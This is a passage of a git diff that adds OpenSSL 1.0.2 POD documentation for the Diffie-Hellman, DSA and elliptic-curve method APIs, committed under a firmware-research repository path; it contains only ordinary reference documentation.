+ int DH_set_method(DH *dh, const DH_METHOD *meth);
+
+ DH *DH_new_method(ENGINE *engine);
+
+ const DH_METHOD *DH_OpenSSL(void);
+
+=head1 DESCRIPTION
+
+A B<DH_METHOD> specifies the functions that OpenSSL uses for Diffie-Hellman
+operations. By modifying the method, alternative implementations
+such as hardware accelerators may be used. IMPORTANT: See the NOTES section for
+important information about how these DH API functions are affected by the use
+of B<ENGINE> API calls.
+
+Initially, the default DH_METHOD is the OpenSSL internal implementation, as
+returned by DH_OpenSSL().
+
+DH_set_default_method() makes B<meth> the default method for all DH
+structures created later. B<NB>: This is true only whilst no ENGINE has been set
+as a default for DH, so this function is no longer recommended.
+
+DH_get_default_method() returns a pointer to the current default DH_METHOD.
+However, the meaningfulness of this result is dependent on whether the ENGINE
+API is being used, so this function is no longer recommended.
+
+DH_set_method() selects B<meth> to perform all operations using the key B<dh>.
+This will replace the DH_METHOD used by the DH key and if the previous method
+was supplied by an ENGINE, the handle to that ENGINE will be released during the
+change. It is possible to have DH keys that only work with certain DH_METHOD
+implementations (eg. from an ENGINE module that supports embedded
+hardware-protected keys), and in such cases attempting to change the DH_METHOD
+for the key can have unexpected results.
+
+DH_new_method() allocates and initializes a DH structure so that B<engine> will
+be used for the DH operations. If B<engine> is NULL, the default ENGINE for DH
+operations is used, and if no default ENGINE is set, the DH_METHOD controlled by
+DH_set_default_method() is used.
+
+=head1 THE DH_METHOD STRUCTURE
+
+ typedef struct dh_meth_st
+ {
+     /* name of the implementation */
+	const char *name;
+
+     /* generate private and public DH values for key agreement */
+        int (*generate_key)(DH *dh);
+
+     /* compute shared secret */
+        int (*compute_key)(unsigned char *key, BIGNUM *pub_key, DH *dh);
+
+     /* compute r = a ^ p mod m (May be NULL for some implementations) */
+        int (*bn_mod_exp)(DH *dh, BIGNUM *r, BIGNUM *a, const BIGNUM *p,
+                                const BIGNUM *m, BN_CTX *ctx,
+                                BN_MONT_CTX *m_ctx);
+
+     /* called at DH_new */
+        int (*init)(DH *dh);
+
+     /* called at DH_free */
+        int (*finish)(DH *dh);
+
+        int flags;
+
+        char *app_data; /* ?? */
+
+ } DH_METHOD;
+
+=head1 RETURN VALUES
+
+DH_OpenSSL() and DH_get_default_method() return pointers to the respective
+B<DH_METHOD>s.
+
+DH_set_default_method() returns no value.
+
+DH_set_method() returns non-zero if the provided B<meth> was successfully set as
+the method for B<dh> (including unloading the ENGINE handle if the previous
+method was supplied by an ENGINE).
+
+DH_new_method() returns NULL and sets an error code that can be obtained by
+L<ERR_get_error(3)|ERR_get_error(3)> if the allocation fails. Otherwise it
+returns a pointer to the newly allocated structure.
+
+=head1 NOTES
+
+As of version 0.9.7, DH_METHOD implementations are grouped together with other
+algorithmic APIs (eg. RSA_METHOD, EVP_CIPHER, etc) in B<ENGINE> modules. If a
+default ENGINE is specified for DH functionality using an ENGINE API function,
+that will override any DH defaults set using the DH API (ie.
+DH_set_default_method()). For this reason, the ENGINE API is the recommended way
+to control default implementations for use in DH and other cryptographic
+algorithms.
+
+=head1 SEE ALSO
+
+L<dh(3)|dh(3)>, L<DH_new(3)|DH_new(3)>
+
+=head1 HISTORY
+
+DH_set_default_method(), DH_get_default_method(), DH_set_method(),
+DH_new_method() and DH_OpenSSL() were added in OpenSSL 0.9.4.
+
+DH_set_default_openssl_method() and DH_get_default_openssl_method() replaced
+DH_set_default_method() and DH_get_default_method() respectively, and
+DH_set_method() and DH_new_method() were altered to use B<ENGINE>s rather than
+B<DH_METHOD>s during development of the engine version of OpenSSL 0.9.6. For
+0.9.7, the handling of defaults in the ENGINE API was restructured so that this
+change was reversed, and behaviour of the other functions resembled more closely
+the previous behaviour. The behaviour of defaults in the ENGINE API now
+transparently overrides the behaviour of defaults in the DH API without
+requiring changing these function prototypes.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_size.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_size.pod
new file mode 100644
index 0000000..97f26fd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_size.pod
@@ -0,0 +1,33 @@
+=pod
+
+=head1 NAME
+
+DH_size - get Diffie-Hellman prime size
+
+=head1 SYNOPSIS
+
+ #include <openssl/dh.h>
+
+ int DH_size(DH *dh);
+
+=head1 DESCRIPTION
+
+This function returns the Diffie-Hellman size in bytes. It can be used
+to determine how much memory must be allocated for the shared secret
+computed by DH_compute_key().
+
+B<dh-E<gt>p> must not be B<NULL>.
+
+=head1 RETURN VALUE
+
+The size in bytes.
+
+=head1 SEE ALSO
+
+L<dh(3)|dh(3)>, L<DH_generate_key(3)|DH_generate_key(3)>
+
+=head1 HISTORY
+
+DH_size() is available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_SIG_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_SIG_new.pod
new file mode 100644
index 0000000..3ac6140
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_SIG_new.pod
@@ -0,0 +1,40 @@
+=pod
+
+=head1 NAME
+
+DSA_SIG_new, DSA_SIG_free - allocate and free DSA signature objects
+
+=head1 SYNOPSIS
+
+ #include <openssl/dsa.h>
+
+ DSA_SIG *DSA_SIG_new(void);
+
+ void	DSA_SIG_free(DSA_SIG *a);
+
+=head1 DESCRIPTION
+
+DSA_SIG_new() allocates and initializes a B<DSA_SIG> structure.
+
+DSA_SIG_free() frees the B<DSA_SIG> structure and its components. The
+values are erased before the memory is returned to the system.
+
+=head1 RETURN VALUES
+
+If the allocation fails, DSA_SIG_new() returns B<NULL> and sets an
+error code that can be obtained by
+L<ERR_get_error(3)|ERR_get_error(3)>. Otherwise it returns a pointer
+to the newly allocated structure.
+
+DSA_SIG_free() returns no value.
+
+=head1 SEE ALSO
+
+L<dsa(3)|dsa(3)>, L<ERR_get_error(3)|ERR_get_error(3)>,
+L<DSA_do_sign(3)|DSA_do_sign(3)>
+
+=head1 HISTORY
+
+DSA_SIG_new() and DSA_SIG_free() were added in OpenSSL 0.9.3.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_do_sign.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_do_sign.pod
new file mode 100644
index 0000000..5dfc733
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_do_sign.pod
@@ -0,0 +1,47 @@
+=pod
+
+=head1 NAME
+
+DSA_do_sign, DSA_do_verify - raw DSA signature operations
+
+=head1 SYNOPSIS
+
+ #include <openssl/dsa.h>
+
+ DSA_SIG *DSA_do_sign(const unsigned char *dgst, int dlen, DSA *dsa);
+
+ int DSA_do_verify(const unsigned char *dgst, int dgst_len,
+	     DSA_SIG *sig, DSA *dsa);
+
+=head1 DESCRIPTION
+
+DSA_do_sign() computes a digital signature on the B<len> byte message
+digest B<dgst> using the private key B<dsa> and returns it in a
+newly allocated B<DSA_SIG> structure.
+
+L<DSA_sign_setup(3)|DSA_sign_setup(3)> may be used to precompute part
+of the signing operation in case signature generation is
+time-critical.
+
+DSA_do_verify() verifies that the signature B<sig> matches a given
+message digest B<dgst> of size B<len>.  B<dsa> is the signer's public
+key.
+
+=head1 RETURN VALUES
+
+DSA_do_sign() returns the signature, NULL on error.  DSA_do_verify()
+returns 1 for a valid signature, 0 for an incorrect signature and -1
+on error. The error codes can be obtained by
+L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<dsa(3)|dsa(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<rand(3)|rand(3)>,
+L<DSA_SIG_new(3)|DSA_SIG_new(3)>,
+L<DSA_sign(3)|DSA_sign(3)>
+
+=head1 HISTORY
+
+DSA_do_sign() and DSA_do_verify() were added in OpenSSL 0.9.3.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_dup_DH.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_dup_DH.pod
new file mode 100644
index 0000000..7f6f0d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_dup_DH.pod
@@ -0,0 +1,36 @@
+=pod
+
+=head1 NAME
+
+DSA_dup_DH - create a DH structure out of DSA structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/dsa.h>
+
+ DH * DSA_dup_DH(const DSA *r);
+
+=head1 DESCRIPTION
+
+DSA_dup_DH() duplicates DSA parameters/keys as DH parameters/keys. q
+is lost during that conversion, but the resulting DH parameters
+contain its length.
+
+=head1 RETURN VALUE
+
+DSA_dup_DH() returns the new B<DH> structure, and NULL on error. The
+error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 NOTE
+
+Be careful to avoid small subgroup attacks when using this.
+
+=head1 SEE ALSO
+
+L<dh(3)|dh(3)>, L<dsa(3)|dsa(3)>, L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 HISTORY
+
+DSA_dup_DH() was added in OpenSSL 0.9.4.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_generate_key.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_generate_key.pod
new file mode 100644
index 0000000..af83ccf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_generate_key.pod
@@ -0,0 +1,34 @@
+=pod
+
+=head1 NAME
+
+DSA_generate_key - generate DSA key pair
+
+=head1 SYNOPSIS
+
+ #include <openssl/dsa.h>
+
+ int DSA_generate_key(DSA *a);
+
+=head1 DESCRIPTION
+
+DSA_generate_key() expects B<a> to contain DSA parameters. It generates
+a new key pair and stores it in B<a-E<gt>pub_key> and B<a-E<gt>priv_key>.
+
+The PRNG must be seeded prior to calling DSA_generate_key().
+
+=head1 RETURN VALUE
+
+DSA_generate_key() returns 1 on success, 0 otherwise.
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<dsa(3)|dsa(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<rand(3)|rand(3)>,
+L<DSA_generate_parameters(3)|DSA_generate_parameters(3)>
+
+=head1 HISTORY
+
+DSA_generate_key() is available since SSLeay 0.8.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_generate_parameters.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_generate_parameters.pod
new file mode 100644
index 0000000..16a67f2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_generate_parameters.pod
@@ -0,0 +1,121 @@
+=pod
+
+=head1 NAME
+
+DSA_generate_parameters_ex, DSA_generate_parameters - generate DSA parameters
+
+=head1 SYNOPSIS
+
+ #include <openssl/dsa.h>
+
+ int DSA_generate_parameters_ex(DSA *dsa, int bits,
+		const unsigned char *seed,int seed_len,
+		int *counter_ret, unsigned long *h_ret, BN_GENCB *cb);
+
+Deprecated:
+
+ DSA *DSA_generate_parameters(int bits, unsigned char *seed,
+                int seed_len, int *counter_ret, unsigned long *h_ret,
+		void (*callback)(int, int, void *), void *cb_arg);
+
+=head1 DESCRIPTION
+
+DSA_generate_parameters_ex() generates primes p and q and a generator g
+for use in the DSA and stores the result in B<dsa>.
+
+B<bits> is the length of the prime to be generated; the DSS allows a
+maximum of 1024 bits.
+
+If B<seed> is B<NULL> or B<seed_len> E<lt> 20, the primes will be
+generated at random. Otherwise, the seed is used to generate
+them. If the given seed does not yield a prime q, a new random
+seed is chosen and placed at B<seed>.
+
+DSA_generate_parameters_ex() places the iteration count in
+*B<counter_ret> and a counter used for finding a generator in
+*B<h_ret>, unless these are B<NULL>.
+
+A callback function may be used to provide feedback about the progress
+of the key generation. If B<cb> is not B<NULL>, it will be
+called as shown below. For information on the BN_GENCB structure and the
+BN_GENCB_call function discussed below, refer to
+L<BN_generate_prime(3)|BN_generate_prime(3)>.
+
+=over 4
+
+=item *
+
+When a candidate for q is generated, B<BN_GENCB_call(cb, 0, m++)> is called
+(m is 0 for the first candidate).
+
+=item *
+
+When a candidate for q has passed a test by trial division,
+B<BN_GENCB_call(cb, 1, -1)> is called.
+While a candidate for q is tested by Miller-Rabin primality tests,
+B<BN_GENCB_call(cb, 1, i)> is called in the outer loop
+(once for each witness that confirms that the candidate may be prime);
+i is the loop counter (starting at 0).
+
+=item *
+
+When a prime q has been found, B<BN_GENCB_call(cb, 2, 0)> and
+B<BN_GENCB_call(cb, 3, 0)> are called.
+
+=item *
+
+Before a candidate for p (other than the first) is generated and tested,
+B<BN_GENCB_call(cb, 0, counter)> is called.
+
+=item *
+
+When a candidate for p has passed the test by trial division,
+B<BN_GENCB_call(cb, 1, -1)> is called.
+While it is tested by the Miller-Rabin primality test,
+B<BN_GENCB_call(cb, 1, i)> is called in the outer loop
+(once for each witness that confirms that the candidate may be prime).
+i is the loop counter (starting at 0).
+
+=item *
+
+When p has been found, B<BN_GENCB_call(cb, 2, 1)> is called.
+
+=item *
+
+When the generator has been found, B<BN_GENCB_call(cb, 3, 1)> is called.
+
+=back
+
+DSA_generate_parameters() (deprecated) works in much the same way as for DSA_generate_parameters_ex, except that no B<dsa> parameter is passed and
+instead a newly allocated B<DSA> structure is returned. Additionally "old
+style" callbacks are used instead of the newer BN_GENCB based approach.
+Refer to L<BN_generate_prime(3)|BN_generate_prime(3)> for further information.
+
+=head1 RETURN VALUE
+
+DSA_generate_parameters_ex() returns a 1 on success, or 0 otherwise.
+
+DSA_generate_parameters() returns a pointer to the DSA structure, or
+B<NULL> if the parameter generation fails.
+
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 BUGS
+
+Seed lengths E<gt> 20 are not supported.
+
+=head1 SEE ALSO
+
+L<dsa(3)|dsa(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<rand(3)|rand(3)>,
+L<DSA_free(3)|DSA_free(3)>, L<BN_generate_prime(3)|BN_generate_prime(3)>
+
+=head1 HISTORY
+
+DSA_generate_parameters() appeared in SSLeay 0.8. The B<cb_arg>
+argument was added in SSLeay 0.9.0.
+In versions up to OpenSSL 0.9.4, B<callback(1, ...)> was called
+in the inner loop of the Miller-Rabin test whenever it reached the
+squaring step (the parameters to B<callback> did not reveal how many
+witnesses had been tested); since OpenSSL 0.9.5, B<callback(1, ...)>
+is called as in BN_is_prime(3), i.e. once for each witness.
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_get_ex_new_index.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_get_ex_new_index.pod
new file mode 100644
index 0000000..fb6efc1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_get_ex_new_index.pod
@@ -0,0 +1,36 @@
+=pod
+
+=head1 NAME
+
+DSA_get_ex_new_index, DSA_set_ex_data, DSA_get_ex_data - add application specific data to DSA structures
+
+=head1 SYNOPSIS
+
+ #include <openssl/dsa.h>
+
+ int DSA_get_ex_new_index(long argl, void *argp,
+		CRYPTO_EX_new *new_func,
+		CRYPTO_EX_dup *dup_func,
+		CRYPTO_EX_free *free_func);
+
+ int DSA_set_ex_data(DSA *d, int idx, void *arg);
+
+ char *DSA_get_ex_data(DSA *d, int idx);
+
+=head1 DESCRIPTION
+
+These functions handle application specific data in DSA
+structures. Their usage is identical to that of
+RSA_get_ex_new_index(), RSA_set_ex_data() and RSA_get_ex_data()
+as described in L<RSA_get_ex_new_index(3)>.
+
+=head1 SEE ALSO
+
+L<RSA_get_ex_new_index(3)|RSA_get_ex_new_index(3)>, L<dsa(3)|dsa(3)>
+
+=head1 HISTORY
+
+DSA_get_ex_new_index(), DSA_set_ex_data() and DSA_get_ex_data() are
+available since OpenSSL 0.9.5.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_new.pod
new file mode 100644
index 0000000..48e9b82
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_new.pod
@@ -0,0 +1,42 @@
+=pod
+
+=head1 NAME
+
+DSA_new, DSA_free - allocate and free DSA objects
+
+=head1 SYNOPSIS
+
+ #include <openssl/dsa.h>
+
+ DSA* DSA_new(void);
+
+ void DSA_free(DSA *dsa);
+
+=head1 DESCRIPTION
+
+DSA_new() allocates and initializes a B<DSA> structure. It is equivalent to
+calling DSA_new_method(NULL).
+
+DSA_free() frees the B<DSA> structure and its components. The values are
+erased before the memory is returned to the system.
+
+=head1 RETURN VALUES
+
+If the allocation fails, DSA_new() returns B<NULL> and sets an error
+code that can be obtained by
+L<ERR_get_error(3)|ERR_get_error(3)>. Otherwise it returns a pointer
+to the newly allocated structure.
+
+DSA_free() returns no value.
+
+=head1 SEE ALSO
+
+L<dsa(3)|dsa(3)>, L<ERR_get_error(3)|ERR_get_error(3)>,
+L<DSA_generate_parameters(3)|DSA_generate_parameters(3)>,
+L<DSA_generate_key(3)|DSA_generate_key(3)>
+
+=head1 HISTORY
+
+DSA_new() and DSA_free() are available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_set_method.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_set_method.pod
new file mode 100644
index 0000000..9c1434b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_set_method.pod
@@ -0,0 +1,143 @@
+=pod
+
+=head1 NAME
+
+DSA_set_default_method, DSA_get_default_method,
+DSA_set_method, DSA_new_method, DSA_OpenSSL - select DSA method
+
+=head1 SYNOPSIS
+
+ #include <openssl/dsa.h>
+ #include <openssl/engine.h>
+
+ void DSA_set_default_method(const DSA_METHOD *meth);
+
+ const DSA_METHOD *DSA_get_default_method(void);
+
+ int DSA_set_method(DSA *dsa, const DSA_METHOD *meth);
+
+ DSA *DSA_new_method(ENGINE *engine);
+
+ DSA_METHOD *DSA_OpenSSL(void);
+
+=head1 DESCRIPTION
+
+A B<DSA_METHOD> specifies the functions that OpenSSL uses for DSA
+operations. By modifying the method, alternative implementations
+such as hardware accelerators may be used. IMPORTANT: See the NOTES section for
+important information about how these DSA API functions are affected by the use
+of B<ENGINE> API calls.
+
+Initially, the default DSA_METHOD is the OpenSSL internal implementation,
+as returned by DSA_OpenSSL().
+
+DSA_set_default_method() makes B<meth> the default method for all DSA
+structures created later. B<NB>: This is true only whilst no ENGINE has
+been set as a default for DSA, so this function is no longer recommended.
+
+DSA_get_default_method() returns a pointer to the current default
+DSA_METHOD. However, the meaningfulness of this result is dependent on
+whether the ENGINE API is being used, so this function is no longer 
+recommended.
+
+DSA_set_method() selects B<meth> to perform all operations using the key
+B<rsa>. This will replace the DSA_METHOD used by the DSA key and if the
+previous method was supplied by an ENGINE, the handle to that ENGINE will
+be released during the change. It is possible to have DSA keys that only
+work with certain DSA_METHOD implementations (eg. from an ENGINE module
+that supports embedded hardware-protected keys), and in such cases
+attempting to change the DSA_METHOD for the key can have unexpected
+results.
+
+DSA_new_method() allocates and initializes a DSA structure so that B<engine>
+will be used for the DSA operations. If B<engine> is NULL, the default engine
+for DSA operations is used, and if no default ENGINE is set, the DSA_METHOD
+controlled by DSA_set_default_method() is used.
+
+=head1 THE DSA_METHOD STRUCTURE
+
+struct
+ {
+     /* name of the implementation */
+        const char *name;
+
+     /* sign */
+	DSA_SIG *(*dsa_do_sign)(const unsigned char *dgst, int dlen,
+                                 DSA *dsa);
+
+     /* pre-compute k^-1 and r */
+	int (*dsa_sign_setup)(DSA *dsa, BN_CTX *ctx_in, BIGNUM **kinvp,
+                                 BIGNUM **rp);
+
+     /* verify */
+	int (*dsa_do_verify)(const unsigned char *dgst, int dgst_len,
+                                 DSA_SIG *sig, DSA *dsa);
+
+     /* compute rr = a1^p1 * a2^p2 mod m (May be NULL for some
+                                          implementations) */
+	int (*dsa_mod_exp)(DSA *dsa, BIGNUM *rr, BIGNUM *a1, BIGNUM *p1,
+                                 BIGNUM *a2, BIGNUM *p2, BIGNUM *m,
+                                 BN_CTX *ctx, BN_MONT_CTX *in_mont);
+
+     /* compute r = a ^ p mod m (May be NULL for some implementations) */
+        int (*bn_mod_exp)(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                                 const BIGNUM *p, const BIGNUM *m,
+                                 BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+
+     /* called at DSA_new */
+        int (*init)(DSA *DSA);
+
+     /* called at DSA_free */
+        int (*finish)(DSA *DSA);
+
+        int flags;
+
+        char *app_data; /* ?? */
+
+ } DSA_METHOD;
+
+=head1 RETURN VALUES
+
+DSA_OpenSSL() and DSA_get_default_method() return pointers to the respective
+B<DSA_METHOD>s.
+
+DSA_set_default_method() returns no value.
+
+DSA_set_method() returns non-zero if the provided B<meth> was successfully set as
+the method for B<dsa> (including unloading the ENGINE handle if the previous
+method was supplied by an ENGINE).
+
+DSA_new_method() returns NULL and sets an error code that can be
+obtained by L<ERR_get_error(3)|ERR_get_error(3)> if the allocation
+fails. Otherwise it returns a pointer to the newly allocated structure.
+
+=head1 NOTES
+
+As of version 0.9.7, DSA_METHOD implementations are grouped together with other
+algorithmic APIs (eg. RSA_METHOD, EVP_CIPHER, etc) in B<ENGINE> modules. If a
+default ENGINE is specified for DSA functionality using an ENGINE API function,
+that will override any DSA defaults set using the DSA API (ie.
+DSA_set_default_method()). For this reason, the ENGINE API is the recommended way
+to control default implementations for use in DSA and other cryptographic
+algorithms.
+
+=head1 SEE ALSO
+
+L<dsa(3)|dsa(3)>, L<DSA_new(3)|DSA_new(3)>
+
+=head1 HISTORY
+
+DSA_set_default_method(), DSA_get_default_method(), DSA_set_method(),
+DSA_new_method() and DSA_OpenSSL() were added in OpenSSL 0.9.4.
+
+DSA_set_default_openssl_method() and DSA_get_default_openssl_method() replaced
+DSA_set_default_method() and DSA_get_default_method() respectively, and
+DSA_set_method() and DSA_new_method() were altered to use B<ENGINE>s rather than
+B<DSA_METHOD>s during development of the engine version of OpenSSL 0.9.6. For
+0.9.7, the handling of defaults in the ENGINE API was restructured so that this
+change was reversed, and behaviour of the other functions resembled more closely
+the previous behaviour. The behaviour of defaults in the ENGINE API now
+transparently overrides the behaviour of defaults in the DSA API without
+requiring changing these function prototypes.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_sign.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_sign.pod
new file mode 100644
index 0000000..97389e8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_sign.pod
@@ -0,0 +1,66 @@
+=pod
+
+=head1 NAME
+
+DSA_sign, DSA_sign_setup, DSA_verify - DSA signatures
+
+=head1 SYNOPSIS
+
+ #include <openssl/dsa.h>
+
+ int	DSA_sign(int type, const unsigned char *dgst, int len,
+		unsigned char *sigret, unsigned int *siglen, DSA *dsa);
+
+ int	DSA_sign_setup(DSA *dsa, BN_CTX *ctx, BIGNUM **kinvp,
+                BIGNUM **rp);
+
+ int	DSA_verify(int type, const unsigned char *dgst, int len,
+		unsigned char *sigbuf, int siglen, DSA *dsa);
+
+=head1 DESCRIPTION
+
+DSA_sign() computes a digital signature on the B<len> byte message
+digest B<dgst> using the private key B<dsa> and places its ASN.1 DER
+encoding at B<sigret>. The length of the signature is places in
+*B<siglen>. B<sigret> must point to DSA_size(B<dsa>) bytes of memory.
+
+DSA_sign_setup() may be used to precompute part of the signing
+operation in case signature generation is time-critical. It expects
+B<dsa> to contain DSA parameters. It places the precomputed values
+in newly allocated B<BIGNUM>s at *B<kinvp> and *B<rp>, after freeing
+the old ones unless *B<kinvp> and *B<rp> are NULL. These values may
+be passed to DSA_sign() in B<dsa-E<gt>kinv> and B<dsa-E<gt>r>.
+B<ctx> is a pre-allocated B<BN_CTX> or NULL.
+
+DSA_verify() verifies that the signature B<sigbuf> of size B<siglen>
+matches a given message digest B<dgst> of size B<len>.
+B<dsa> is the signer's public key.
+
+The B<type> parameter is ignored.
+
+The PRNG must be seeded before DSA_sign() (or DSA_sign_setup())
+is called.
+
+=head1 RETURN VALUES
+
+DSA_sign() and DSA_sign_setup() return 1 on success, 0 on error.
+DSA_verify() returns 1 for a valid signature, 0 for an incorrect
+signature and -1 on error. The error codes can be obtained by
+L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 CONFORMING TO
+
+US Federal Information Processing Standard FIPS 186 (Digital Signature
+Standard, DSS), ANSI X9.30
+
+=head1 SEE ALSO
+
+L<dsa(3)|dsa(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<rand(3)|rand(3)>,
+L<DSA_do_sign(3)|DSA_do_sign(3)>
+
+=head1 HISTORY
+
+DSA_sign() and DSA_verify() are available in all versions of SSLeay.
+DSA_sign_setup() was added in SSLeay 0.8.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_size.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_size.pod
new file mode 100644
index 0000000..ba4f650
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DSA_size.pod
@@ -0,0 +1,33 @@
+=pod
+
+=head1 NAME
+
+DSA_size - get DSA signature size
+
+=head1 SYNOPSIS
+
+ #include <openssl/dsa.h>
+
+ int DSA_size(const DSA *dsa);
+
+=head1 DESCRIPTION
+
+This function returns the size of an ASN.1 encoded DSA signature in
+bytes. It can be used to determine how much memory must be allocated
+for a DSA signature.
+
+B<dsa-E<gt>q> must not be B<NULL>.
+
+=head1 RETURN VALUE
+
+The size in bytes.
+
+=head1 SEE ALSO
+
+L<dsa(3)|dsa(3)>, L<DSA_sign(3)|DSA_sign(3)>
+
+=head1 HISTORY
+
+DSA_size() is available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_GFp_simple_method.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_GFp_simple_method.pod
new file mode 100644
index 0000000..aff20ac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_GFp_simple_method.pod
@@ -0,0 +1,60 @@
+=pod
+
+=head1 NAME
+
+EC_GFp_simple_method, EC_GFp_mont_method, EC_GFp_nist_method, EC_GFp_nistp224_method, EC_GFp_nistp256_method, EC_GFp_nistp521_method, EC_GF2m_simple_method, EC_METHOD_get_field_type - Functions for obtaining B<EC_METHOD> objects.
+
+=head1 SYNOPSIS
+
+ #include <openssl/ec.h>
+
+ const EC_METHOD *EC_GFp_simple_method(void);
+ const EC_METHOD *EC_GFp_mont_method(void);
+ const EC_METHOD *EC_GFp_nist_method(void);
+ const EC_METHOD *EC_GFp_nistp224_method(void);
+ const EC_METHOD *EC_GFp_nistp256_method(void);
+ const EC_METHOD *EC_GFp_nistp521_method(void);
+
+ const EC_METHOD *EC_GF2m_simple_method(void);
+
+ int EC_METHOD_get_field_type(const EC_METHOD *meth);
+
+=head1 DESCRIPTION
+
+The Elliptic Curve library provides a number of different implementations through a single common interface.
+When constructing a curve using EC_GROUP_new (see L<EC_GROUP_new(3)|EC_GROUP_new(3)>) an
+implementation method must be provided. The functions described here all return a const pointer to an
+B<EC_METHOD> structure that can be passed to EC_GROUP_NEW. It is important that the correct implementation
+type for the form of curve selected is used.
+
+For F2^m curves there is only one implementation choice, i.e. EC_GF2_simple_method.
+
+For Fp curves the lowest common denominator implementation is the EC_GFp_simple_method implementation. All
+other implementations are based on this one. EC_GFp_mont_method builds on EC_GFp_simple_method but adds the
+use of montgomery multiplication (see L<BN_mod_mul_montgomery(3)|BN_mod_mul_montgomery(3)>). EC_GFp_nist_method
+offers an implementation optimised for use with NIST recommended curves (NIST curves are available through
+EC_GROUP_new_by_curve_name as described in L<EC_GROUP_new(3)|EC_GROUP_new(3)>).
+
+The functions EC_GFp_nistp224_method, EC_GFp_nistp256_method and EC_GFp_nistp521_method offer 64 bit
+optimised implementations for the NIST P224, P256 and P521 curves respectively. Note, however, that these
+implementations are not available on all platforms.
+
+EC_METHOD_get_field_type identifies what type of field the EC_METHOD structure supports, which will be either
+F2^m or Fp. If the field type is Fp then the value B<NID_X9_62_prime_field> is returned. If the field type is
+F2^m then the value B<NID_X9_62_characteristic_two_field> is returned. These values are defined in the
+obj_mac.h header file.
+
+=head1 RETURN VALUES
+
+All EC_GFp* functions and EC_GF2m_simple_method always return a const pointer to an EC_METHOD structure.
+
+EC_METHOD_get_field_type returns an integer that identifies the type of field the EC_METHOD structure supports.
+
+=head1 SEE ALSO
+
